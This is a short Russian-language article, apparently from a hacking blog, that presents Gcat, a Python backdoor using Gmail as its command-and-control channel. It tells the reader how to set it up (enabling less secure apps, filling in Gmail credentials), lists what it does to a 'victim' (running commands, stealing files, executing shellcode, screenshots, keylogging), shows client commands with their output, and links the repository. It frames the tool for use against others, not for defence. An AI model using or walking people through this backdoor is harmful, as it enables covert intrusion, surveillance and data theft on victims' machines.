Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о Gcat. Gcat является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис Gmail, для так называемого command and control сервера.
Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией Allow less secure apps, которую можно включать в настройках вашей учетной записи.
Данный нам репозиторий содержит в себе всего лишь 2 файла:
- Gcat.py – сам скрипт, который перечисляет все доступные клиенты и передает им команды
- Implant.py – является самим бэкдором
Чтобы все заработало, нужно изменить всего лишь две переменные, а именно: gmail_user, gmail_pwd.
Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды:
Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер.
Вот так выглядит запуск различных команд в клиенте:
# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’
[*] Command sent successfully with jobid: SH3C4gv
После чего запрашиваем результат для определенного Id и JobId:
# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv
DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’
JOBID: SH3C4gv
FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’
CMD: ‘ipconfig /all’
Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты.
Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat
Данный троян можно запустить на таких операционных системах как Windows и различные Unix-подобные системы.